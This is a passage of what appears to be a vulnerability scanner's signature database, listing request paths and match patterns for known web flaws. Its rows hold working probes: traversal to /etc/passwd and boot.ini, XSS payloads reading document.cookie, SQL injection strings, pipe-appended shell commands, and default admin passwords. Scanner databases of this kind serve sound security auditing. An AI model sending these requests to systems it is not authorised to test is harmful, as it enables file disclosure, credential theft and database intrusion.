Networks Profiler or Sensor is running.","","" "001448","OSVDB-2117","b","/","GET","samba is configured to deny","","","","","Samba-swat web server. Used to administer Samba.","","" "001449","https://cpanel.net/","b","/cpanel/","GET","200","","","","","Web-based control panel","","" "001450","CVE-2003-0560","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities.","","" "001451","CVE-2003-0560","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities.","","" "001452","CVE-1999-1376 BID-2252","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested.","","" "001453","CVE-2003-1088","4","/forum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" "001454","CVE-2003-1088","4","/zorum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" "001455","CVE-1999-0930","2","/wwwboard/passwd.txt","GET","200","","","","","The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.","","" "001456","OSVDB-2562","4","/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).","","" "001457","OSVDB-2562","4","/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).","","" "001458","OSVDB-2562","4","/SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).","","" "001459","OSVDB-2562","4","/SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS).","","" "001460","OSVDB-2617","4","/acart2_0/signin.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" "001461","CVE-2000-0169","3","/ows-bin/perlidlc.bat?&dir","GET","ows-bin:","","","","","The Oracle web listener can be used to execute remote commands.","","" "001462","OSVDB-2695","b","/photo/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","","" "001463","OSVDB-2695","b","/photodata/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","","" "001464","OSVDB-2695","b","@CGIDIRSphoto/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","","" "001465","CVE-2000-0302","2","/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits full highlighting","","","","","All default files should be removed.","","" "001466","CVE-2000-0302","2","/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits summary highlighting\.","","","","","All default files should be removed.","","" "001467","CVE-2000-0302 CVE-2000-0097 MS00-006","5","/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full","GET","\<html\>","","","","","It is possible to retrieve the source of .asp files or view any file on the system. Install the Webhits patch.","","" "001468","CVE-2000-0302 CVE-2000-0097 MS00-006","5","/","GET","null\.htw\?CiWebHitsFile=\/default\.asp\%20\&CiRestriction=none\&CiHiliteType=Full","","","","","It is possible to retrieve the source of .asp files. Install the Webhits patch.","","" "001469","CVE-2000-0540","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini","GET","boot loader","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts.","","" "001470","CVE-2000-0540","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd","GET","root:","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts.","","" "001471","OSVDB-2717","8","@CGIDIRSinclude/new-visitor.inc.php","GET","200","","","","","Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.","","" "001472","OSVDB-2719","3","/%3f.jsp","GET","WEB-INF","","","","","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.","","" "001473","OSVDB-2719","3","/%3f.jsp","GET","WebTide","","","","","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.","","" "001474","CVE-1999-1011 BID-529 MS98-004 MS99-025 http://attrition.org/security/advisory/individual/rfp/rfp.9902.rds_iis","8","/msadc/msadcs.dll","GET","200","","","not authorized","","","","" "001475","OSVDB-2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","","" "001476","OSVDB-2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","","" "001477","OSVDB-2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","","" "001478","OSVDB-2723","3","/Search","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","","" "001479","CVE-2003-1140,http://musicqueue.sourceforge.net/","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted).","","" "001480","CVE-2003-1140,http://musicqueue.sourceforge.net/","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted).","","" "001481","BID-1818 CVE-1999-0191 http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server.","","" "001482","OSVDB-2780","7","/OpenFile.aspx?file=../../../../../../../../../../boot.ini","GET","boot loader","","","","","HTTP Commander 4.0 allows directory traversal and reading of arbitrary files.","","" "001483","CVE-2000-0242","7","@CGIDIRSwindmail","GET","200","","","","","Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file","","" "001484","CVE-2000-0242","7","@CGIDIRSwindmail.exe","GET","200","","","","","Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file","","" "001485","CVE-2000-0242","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%","GET","boot loader","","","","","WINDMAIL.EXE can read arbitrary files","","" "001486","CVE-2000-0242","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\","GET","200","","","","","WINDMAIL.EXE can read arbitrary files","","" "001487","CVE-2003-1175","4","/index.php?vo=\"><script>alert(document.cookie);</script>","GET","><script>alert\(document\.cookie\);<\/script>","","","","","Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS).","","" "001488","OSVDB-2793","7","/.../.../.../.../.../.../.../.../.../.../etc/passwd","GET","root:","","","","","TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal.","","" "001489","OSVDB-2799","8","@CGIDIRSdose.pl?daily&somefile.txt&|ls|","GET","somefile\.txt","","200","","","DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.","","" "001490","OSVDB-2813","4","/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" "001491","OSVDB-2830","5","/../config.dat","GET","EnablePasswords","","","","","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.","","" "001492","CVE-1999-0407","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" "001493","CVE-1999-0407","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" "001494","CVE-1999-0407","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" "001495","CVE-1999-0407","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" "001496","CVE-1999-0407","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" "001497","CVE-2006-3604","a","//admin/aindex.htm","GET","200","","","","","FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra /'s.","","" "001498","OSVDB-2873","a","@CGIDIRSgbadmin.cgi?action=change_adminpass","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" "001499","OSVDB-2873","a","@CGIDIRSgbadmin.cgi?action=change_automail","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" "001500","OSVDB-2873","a","@CGIDIRSgbadmin.cgi?action=colors","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" "001501","OSVDB-2873","a","@CGIDIRSgbadmin.cgi?action=setup","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" "001502","OSVDB-2915","a","@CGIDIRSgbpass.pl","GET","200","","","","","RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@ha","","" "001503","https://seclists.org/bugtraq/2004/Jun/210","4","/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","GET","<script>alert\('test'\)<\/script>","","","","","VP-ASP prior to 4.50 are vulnerable to XSS attacks","","" "001504","https://seclists.org/bugtraq/2004/Jun/210","4","/shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.","","" "001505","OSVDB-2922","3","/admin/wg_user-info.ml","GET","200","","","","","WebGate Web Eye exposes user names and passwords.","","" "001506","OSVDB-2927","4","/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*","GET","Statistics for your banner","","","","","Xoops 1.3.x, 2.0.x thru 2.0.5 are vulnerable to SQL injection in the banners.php file. Upgrade to 2.0.5.1 or higher.","","" "001507","CVE-2000-0429","a","/c32web.exe/ChangeAdminPassword","GET","200","","","","","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.","","" "001508","OSVDB-2944","3","/showmail.pl","GET","200","","","","","@Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.","","" "001509","OSVDB-2948","9","/reademail.pl","GET","200","","","","","@Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1","","" "001510","OSVDB-2950","4","/showmail.pl?Folder=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","404","","@Mail WebMail 3.52 contains an XSS in the showmail.pl file.","","" "001511","CVE-1999-0449","6","/iissamples/exair/search/query.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server.","","" "001512","CVE-2005-1598","9","/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]","GET","query error","","mySQL error","","","Invision Power Board 2.0alpha3 and before are vulnerable to an SQL injection attack.","","" "001513","https://www.exploit-db.com/exploits/43806","9","/index.php?offset=[%20Problem%20Here%20]","GET","error in your SQL syntax","","","","","Invision Power Top Site List 1.1 contains an SQL injection vulnerability.","","" "001514","","1","/buddies.blt","GET","200","","","","","Buddy List?","","" "001515","","1","/buddy.blt","GET","200","","","","","Buddy List?","","" "001516","","1","/buddylist.blt","GET","200","","","","","Buddy List?","","" "001517","","1","@CGIDIRSaddalink.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001518","","1","@CGIDIRScgiecho","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001519","","1","@CGIDIRScgiemail","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001520","","1","@CGIDIRScountedit","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001521","","1","@CGIDIRSdomainredirect.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001522","","1","@CGIDIRSentropybanner.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001523","","1","@CGIDIRSentropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/","GET","(Permission denied|No matches)","","","","","CPanel's Entropy Search allows username enumeration via the user parameter.","","" "001524","","1","@CGIDIRSFormMail-clone.cgi","GET","Matt\sWright","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001525","","1","@CGIDIRShelpdesk.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001526","","1","@CGIDIRSmchat.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001527","","1","@CGIDIRSrandhtml.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001528","","1","@CGIDIRSrealhelpdesk.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001529","","1","@CGIDIRSrealsignup.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001530","","1","@CGIDIRSscgiwrap","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001531","","1","@CGIDIRSsignup.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" "001532","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","12","/pdf/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001533","","1","/sqlnet.log","GET","200","","","","","Oracle log file found.","","" "001534","","1","@CGIDIRSGW5/GWWEB.EXE","GET","200","","","","","Groupwise web interface","","" "001535","","1","/.psql_history","GET","^(INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)","","200","","","This might be interesting.","","" "001536","","1","/acceso/","GET","200","","","","","This might be interesting.","","" "001537","","1","/access-log","GET","200","","","","","This might be interesting.","","" "001538","","1","/access.log","GET","200","","","","","This might be interesting.","","" "001539","","1","/access/","GET","200","","","","","This might be interesting.","","" "001540","","1","/access_log","GET","200","","","","","This might be interesting.","","" "001541","","1","/acciones/","GET","200","","","","","This might be interesting.","","" "001542","","1","/account/","GET","200","","","","","This might be interesting.","","" "001543","","1","/accounting/","GET","200","","","","","This might be interesting.","","" "001544","","1","/activex/","GET","200","","","","","This might be interesting.","","" "001545","","1","/adm/","GET","200","","","","","This might be interesting.","","" "001546","","1","/admin.htm","GET","200","","","","","This might be interesting.","","" "001547","","1","/admin.html","GET","200","","","","","This might be interesting.","","" "001548","","1","/admin.php","GET","200","","","","","This might be interesting.","","" "001549","","1","/admin.php3","GET","200","","","","","This might be interesting.","","" "001550","","1","/admin.shtml","GET","200","","","","","This might be interesting.","","" "001551","","1","/admin/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "001552","","1","/Administration/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "001553","","1","/administration/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "001554","","1","/administrator/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "001555","","1","/Admin_files/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "001556","","1","/advwebadmin/","GET","200","","","","","This might be interesting: probably HostingController, www.hostingcontroller.com","","" "001557","","1","/Agent/","GET","200","","","","","This might be interesting.","","" "001558","","1","/Agentes/","GET","200","","","","","This might be interesting.","","" "001559","","1","/agentes/","GET","200","","","","","This might be interesting.","","" "001560","","1","/Agents/","GET","200","","","","","This might be interesting.","","" "001561","","1","/analog/","GET","200","","","","","This might be interesting.","","" "001562","","1","/apache/","GET","200","","","","","This might be interesting.","","" "001563","","1","/app/","GET","200","","","","","This might be interesting.","","" "001564","","1","/applicattion/","GET","200","","","","","This might be interesting.","","" "001565","","1","/applicattions/","GET","200","","","","","This might be interesting.","","" "001566","","1","/apps/","GET","200","","","","","This might be interesting.","","" "001567","","1","/archivar/","GET","200","","","","","This might be interesting.","","" "001568","","1","/archive/","GET","200","","","","","This might be interesting.","","" "001569","","1","/archives/","GET","200","","","","","This might be interesting.","","" "001570","","1","/archivo/","GET","200","","","","","This might be interesting.","","" "001571","","1","/asp/","GET","200","","","","","This might be interesting.","","" "001572","","1","/Asp/","GET","200","","","","","This might be interesting.","","" "001573","","1","/atc/","GET","200","","","","","This might be interesting.","","" "001574","","1","/auth/","GET","200","","","","","This might be interesting.","","" "001575","","1","/awebvisit.stat","GET","200","","","","","This might be interesting.","","" "001576","","1","/ayuda/","GET","200","","","","","This might be interesting.","","" "001577","","1","/backdoor/","GET","200","","","","","This might be interesting.","","" "001578","","1","/backup/","GET","200","","","","","This might be interesting.","","" "001579","","1","/bak/","GET","200","","","","","This might be interesting.","","" "001580","","1","/banca/","GET","200","","","","","This might be interesting.","","" "001581","","1","/banco/","GET","200","","","","","This might be interesting.","","" "001582","","1","/bank/","GET","200","","","","","This might be interesting.","","" "001583","","1","/bbv/","GET","200","","","","","This might be interesting.","","" "001584","","1","/bdata/","GET","200","","","","","This might be interesting.","","" "001585","","1","/bdatos/","GET","200","","","","","This might be interesting.","","" "001586","","1","/beta/","GET","200","","","","","This might be interesting.","","" "001587","","1","/bin/","GET","200","","","","","This might be interesting.","","" "001588","","1","/boot/","GET","200","","","","","This might be interesting.","","" "001589","","1","/buy/","GET","200","","","","","This might be interesting.","","" "001590","","1","/buynow/","GET","200","","","","","This might be interesting.","","" "001591","","1","/c/","GET","200","","","","","This might be interesting.","","" "001592","","1","/cache-stats/","GET","200","","","","","This might be interesting.","","" "001593","","1","/caja/","GET","200","","","","","This might be interesting.","","" "001594","","1","/card/","GET","200","","","","","This might be interesting.","","" "001595","","1","/cards/","GET","200","","","","","This might be interesting.","","" "001596","","1","/cart/","GET","200","","","","","This might be interesting.","","" "001597","","1","/cash/","GET","200","","","","","This might be interesting.","","" "001598","","1","/ccard/","GET","200","","","","","This might be interesting.","","" "001599","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/ccbill/secure/ccbill.log","GET","200","","","","","CC Bill log file. Seen in carding forums.","","" "001601","","1","/cdrom/","GET","200","","","","","This might be interesting.","","" "001602","","1","/cert/","GET","200","","","","","This might be interesting.","","" "001603","","1","/certificado/","GET","200","","","","","This might be interesting.","","" "001604","","1","/certificate","GET","200","","","","","This might be interesting.","","" "001605","","1","/certificates","GET","200","","","","","This might be interesting.","","" "001606","","1","/cfdocs/exampleapp/email/application.cfm","GET","200","","","","","This might be interesting.","","" "001607","","1","/cfdocs/exampleapp/publish/admin/addcontent.cfm","GET","200","","","","","This might be interesting.","","" "001608","","1","/cfdocs/exampleapp/publish/admin/application.cfm","GET","200","","","","","This might be interesting.","","" "001609","","1","/cfdocs/examples/httpclient/mainframeset.cfm","GET","200","","","","","This might be interesting.","","" "001610","","1","@CGIDIRSdbmlparser.exe","GET","200","","","","","This might be interesting.","","" "001612","","1","/client/","GET","200","","","","","This might be interesting.","","" "001613","","1","/cliente/","GET","200","","","","","This might be interesting.","","" "001614","","1","/clientes/","GET","200","","","","","This might be interesting.","","" "001615","","1","/clients/","GET","200","","","","","This might be interesting.","","" "001617","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/code/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001618","","1","/communicator/","GET","200","","","","","This might be interesting.","","" "001619","","1","/compra/","GET","200","","","","","This might be interesting.","","" "001620","","1","/compras/","GET","200","","","","","This might be interesting.","","" "001621","","1","/compressed/","GET","200","","","","","This might be interesting.","","" "001622","","1","/conecta/","GET","200","","","","","This might be interesting.","","" "001623","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/config/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001624","","1","/config/checks.txt","GET","200","","","","","This might be interesting.","","" "001625","","1","/connect/","GET","200","","","","","This might be interesting.","","" "001626","","1e","/console","GET","200","","","","","This might be interesting.","","" "001627","","1","/correo/","GET","200","","","","","This might be interesting.","","" "001628","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/counter/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001629","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/credit/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001630","","1","/crypto/","GET","200","","","","","This might be interesting.","","" "001631","","1","/css/","GET","200","","","","","This might be interesting.","","" "001632","","1","/cuenta/","GET","200","","","","","This might be interesting.","","" "001633","","1","/cuentas/","GET","200","","","","","This might be interesting.","","" "001634","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/customers/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001635","","1","/dan_o.dat","GET","200","","","","","This might be interesting.","","" "001636","","1","/dat/","GET","200","","","","","This might be interesting.","","" "001637","","1","/data/","GET","200","","","","","This might be interesting.","","" "001638","","1","/dato/","GET","200","","","","","This might be interesting.","","" "001639","","1","/datos/","GET","200","","","","","This might be interesting.","","" "001640","","1","/db/","GET","200","","","","","This might be interesting.","","" "001641","","1","/dbase/","GET","200","","","","","This might be interesting.","","" "001642","","1","/demo/","GET","200","","","","","This might be interesting.","","" "001643","","1","/demos/","GET","200","","","","","This might be interesting.","","" "001644","","1","/dev/","GET","200","","","","","This might be interesting.","","" "001645","","1","/devel/","GET","200","","","","","This might be interesting.","","" "001646","","1","/development/","GET","200","","","","","This might be interesting.","","" "001647","","1","/dir/","GET","200","","","","","This might be interesting.","","" "001648","","1","/directory/","GET","200","","","","","This might be interesting.","","" "001649","","1","/DMR/","GET","200","","","","","This might be interesting.","","" "001650","","1","/doc-html/","GET","200","","","","","This might be interesting.","","" "001651","","1","/down/","GET","200","","","","","This might be interesting.","","" "001652","","1","/download/","GET","200","","","","","This might be interesting.","","" "001653","","1","/downloads/","GET","200","","","","","This might be interesting.","","" "001654","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/easylog/easylog.html","GET","200","","","","","Seen in carding forums.","","" "001655","","1","/ejemplo/","GET","200","","","","","This might be interesting.","","" "001656","","1","/ejemplos/","GET","200","","","","","This might be interesting.","","" "001657","","1","/employees/","GET","200","","","","","This might be interesting.","","" "001658","","1","/envia/","GET","200","","","","","This might be interesting.","","" "001659","","1","/enviamail/","GET","200","","","","","This might be interesting.","","" "001660","","1","/error_log","GET","200","","","","","This might be interesting.","","" "001662","","1","/excel/","GET","200","","","","","This might be interesting.","","" "001663","","1","/Excel/","GET","200","","","","","This might be interesting.","","" "001664","","1","/EXE/","GET","200","","","","","This might be interesting.","","" "001665","","1","/exe/","GET","200","","","","","This might be interesting.","","" "001666","","1","/fbsd/","GET","200","","","","","This might be interesting.","","" "001667","","1","/file/","GET","200","","","","","This might be interesting.","","" "001668","","1","/fileadmin/","GET","200","","","","","This might be interesting.","","" "001669","","1","/files/","GET","200","","","","","This might be interesting.","","" "001670","","1","/forum/","GET","200","","","","","This might be interesting.","","" "001671","","1","/forums/","GET","200","","","","","This might be interesting.","","" "001672","","1","/foto/","GET","200","","","","","This might be interesting.","","" "001673","","1","/fotos/","GET","200","","","","","This might be interesting.","","" "001674","","1","/fpadmin/","GET","200","","","","","This might be interesting.","","" "001675","","1","/ftp/","GET","200","","","","","This might be interesting.","","" "001676","","1","/gfx/","GET","200","","","","","This might be interesting.","","" "001677","","1","/global/","GET","200","","","","","This might be interesting.","","" "001678","","1","/graphics/","GET","200","","","","","This might be interesting.","","" "001679","","1","/guest/","GET","200","","","","","This might be interesting.","","" "001680","","1","/guestbook/","GET","200","","","","","This might be interesting.","","" "001681","","1","/guests/","GET","200","","","","","This might be interesting.","","" "001682","","1","/hidden/","GET","200","","","","","This might be interesting.","","" "001683","","1","/hitmatic/","GET","200","","","","","This might be interesting.","","" "001684","","1","/hitmatic/analyse.cgi","GET","200","","","","","This might be interesting.","","" "001685","","1","/hits.txt","GET","200","","","","","This might be interesting.","","" "001686","","1","/hit_tracker/","GET","200","","","","","This might be interesting.","","" "001687","","1","/home/","GET","200","","","","","This might be interesting.","","" "001688","","1","/homepage/","GET","200","","","","","This might be interesting.","","" "001689","","1","/htdocs/","GET","200","","","","","This might be interesting.","","" "001690","","1","/html/","GET","200","","","","","This might be interesting.","","" "001691","","1","/htpasswd","GET","200","","","","","This might be interesting.","","" "001693","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/hyperstat/stat_what.log","GET","200","","","","","This might be interesting.","","" "001694","","1","/ibill/","GET","200","","","","","This might be interesting.","","" "001695","","1","/idea/","GET","200","","","","","This might be interesting.","","" "001696","","1","/ideas/","GET","200","","","","","This might be interesting.","","" "001697","","1","/imagenes/","GET","200","","","","","This might be interesting.","","" "001698","","1","/img/","GET","200","","","","","This might be interesting.","","" "001699","","1","/imgs/","GET","200","","","","","This might be interesting.","","" "001700","","1","/import/","GET","200","","","","","This might be interesting.","","" "001701","","1","/impreso/","GET","200","","","","","This might be interesting.","","" "001702","","1","/includes/","GET","200","","","","","This might be interesting.","","" "001703","","1","/incoming/","GET","200","","","","","This might be interesting.","","" "001704","","1","/info/","GET","200","","","","","This might be interesting.","","" "001705","","1","/informacion/","GET","200","","","","","This might be interesting.","","" "001706","","1","/information/","GET","200","","","","","This might be interesting.","","" "001707","","1","/ingresa/","GET","200","","","","","This might be interesting.","","" "001708","","1","/ingreso/","GET","200","","","","","This might be interesting.","","" "001709","","1","/install/","GET","200","","","","","This might be interesting.","","" "001710","","1","/internal/","GET","200","","","","","This might be interesting.","","" "001711","","1","/intranet/","GET","200","","","","","This might be interesting.","","" "001712","","1","/invitado/","GET","200","","","","","This might be interesting.","","" "001713","","1","/invitados/","GET","200","","","","","This might be interesting.","","" "001714","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/java-plugin/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001715","","1","/java/","GET","200","","","","","This might be interesting.","","" "001716","","1","/jdbc/","GET","200","","","","","This might be interesting.","","" "001717","","1","/job/","GET","200","","","","","This might be interesting.","","" "001718","","1","/jrun/","GET","200","","","","","This might be interesting.","","" "001719","","1","/js","GET","200","","","","","This might be interesting.","","" "001720","","1","/lib/","GET","200","","","","","This might be interesting.","","" "001721","","1","/library/","GET","200","","","","","This might be interesting.","","" "001722","","1","/libro/","GET","200","","","","","This might be interesting.","","" "001723","","1","/linux/","GET","200","","","","","This might be interesting.","","" 